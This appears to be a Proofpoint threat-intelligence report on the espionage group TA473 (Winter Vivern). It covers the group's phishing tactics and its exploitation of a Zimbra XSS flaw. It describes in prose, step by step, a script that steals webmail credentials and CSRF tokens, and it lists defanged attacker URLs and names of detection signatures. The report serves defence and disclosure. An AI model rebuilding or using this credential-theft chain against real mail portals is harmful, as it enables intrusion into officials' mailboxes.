- Proofpoint has observed recent espionage-related activity by TA473, including yet to be reported instances of TA473 targeting US elected officials and staffers. TA473 is a newly minted Proofpoint threat actor that aligns with public reporting on Winter Vivern.
- TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe.
- Proofpoint concurs with Sentinel One analysis that TA473 targeting superficially aligns with the support of Russian and/or Belarussian geopolitical goals as they pertain to the Russia-Ukraine War.
Proofpoint researchers recently promoted TA473 to a publicly tracked threat actor. Known in open-source research as Winter Vivern, Proofpoint has tracked this activity cluster since at least 2021.
Who is TA473?
What Does a TA473 Phishing Campaign Look Like?
Proofpoint has observed an evolution of TA473 phishing campaigns since 2021. This threat actor has been observed employing opportunistic exploits to target its victims which include popular 1-day vulnerabilities like the CVE-2022-30190 (“Follina”) exploit disclosed in May 2022. However, most commonly this threat actor leverages a recurring set of phishing techniques in every email campaign. The phishing tactics below have consistently been observed across both US and European targets as well as among credential harvesting, malware delivery, and cross-site request forgery (CSRF) campaigns.
- TA473 sends emails from compromised email addresses. Often these emails originate from WordPress hosted domains that may be unpatched or unsecure at the time of compromise.
- TA473 spoofs the from field of the email to appear as a user at the targeted organization OR TA473 spoofs the from field of the email to appear as a relevant peer organization involved in global politics.
- TA473 includes a benign URL from either the targeted organization or a relevant peer organization in the body of the email.
- TA473 then hyperlinks this benign recognized URL with actor-controlled or compromised infrastructure to deliver a first-stage payload or to redirect to a credential harvesting landing page.
- TA473 often uses structured URI paths that indicate a hashed value for the targeted individual, an unencoded indication of the targeted organization, and in some cases encoded or plaintext versions of the benign URL that was hyperlinked in the initial email to targets.
Figure 1. TA473 email including hyperlinked URL redirecting to a malicious actor-controlled resource.
Exploitation of Disclosed Zimbra Vulnerability to Target Public Facing Webmail Portals
Beginning in early 2023, Proofpoint observed a trend of TA473 phishing campaigns targeting European government entities that take advantage of CVE-2022-27926. This vulnerability impacts Zimbra Collaboration (previously “the Zimbra Collaboration Suite”) versions 9.0.0, which is used to host publicly facing webmail portals. The vulnerability is described as a “reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 (which) allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.”
Figure 2. TA473 CSRF infection diagram.
Customized Cross-Site Request Forgery
- Steal usernames
- Steal user's password
- Steal an active CSRF token from a cookie in the web request response
- Caches the stolen values to the actor-controlled server
- Attempts login to the legitimate mail portal with active tokens
- The script utilizes the additional URLs in its functionality:
- Displays Pop3 and IMAP instructions hosted on actor-controlled server
- Attempts logins to legitimate webmail portal via the native URL
An extended sequence of the observed script’s actions is as follows:
- Establishes the malicious server domain for the cache of stolen user values
- References a targeted account name
- Gets date and time
- Gets account name variables
- Sets time out window at 1000s
- Function to send credentials "on click"
- Sends username and password in URI encoded fashion
- If password fails with a length of 0 (AKA no password), the script prompts user with: "The username or password is incorrect. Verify that CAPS LOCK is not on, and then retype the current username and password."; return;"
- The script then logs the username, the password, and the CSRF token from the web request response.
- If that attempt fails, the script again attempts to post to the targeted server and fetch an ElementbyID "lic34yo8o" and remove this element tagged "body" in the response
- It then again attempts to save the “accountname” variable, username variable, and password variable.
- The script attempts to login to the legitimate webmail portal using custom hardcoded URI structures that appear to be unique to the targeted domain and appends a username, password, and CSRF token to the URI structures which were previously captured.
- The script also has a function to login with stolen credential and token content.
- The script has a function to show Zimbra Pop3 and IMAP login information page hosted on actor-controlled infrastructure.
- The script has a function to show the legitimate webmail portal login window.
- The script has a function to "initLoginField" which appears to input the username and account name to the legitimate webmail login window.
- The script has a function to logoff of the mail server and attempt to retrieve the CSRF token at logout, which is then sent to an actor-controlled server.
- The script has a function to retrieve the CSRF token.
Advanced Capabilities May be Ideal, but When in Doubt, Persistence is Key
Proofpoint researchers strongly recommend patching all versions of Zimbra Collaboration used in publicly facing webmail portals, especially among European government entities. Additionally, restricting resources on publicly facing webmail portals from the public internet is highly recommended to prevent groups like TA473 from reconning and engineering custom scripts capable of stealing credentials and logging in to users’ webmail accounts. While TA473 does not lead the pack in sophistication among APT threats targeting the European cyber landscape, they demonstrate focus, persistence, and a repeatable process for compromising geopolitically exposed targets. Like a Vivern in medieval winter, despite having only two legs and a pair of wings, this is likely a threat that will persist year-round.
Indicators of Compromise (IOCs)
Type of IOC
hxxps://ocs-romastassec[.]com/redirect/?id=[target specific ID]&url=[Base64 Encoded Hyperlink URL hochuzhit-com.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&x_tr_pto=wapp]
hxxps://ocspdep[.]com/inotes.sejm.gov.pl?id=[Target Specific SHA256 Hash]
Observed payload delivery URLs
2034117 – ET TROJAN Wintervivern Activity M5 (GET)
2034116 – ET TROJAN Wintervivern Activity M4 (GET)
2034115 – ET TROJAN Wintervivern Retrieving Commands
2034109 – ET TROJAN Wintervivern Activity (GET) M3
2034108 – ET TROJAN Wintervivern Checkin
2034107 – ET TROJAN Wintervivern Retrieving Task
2034106 – ET TROJAN Wintervivern Activity M2 (GET)
2034105 – ET TROJAN Wintervivern Activity (GET)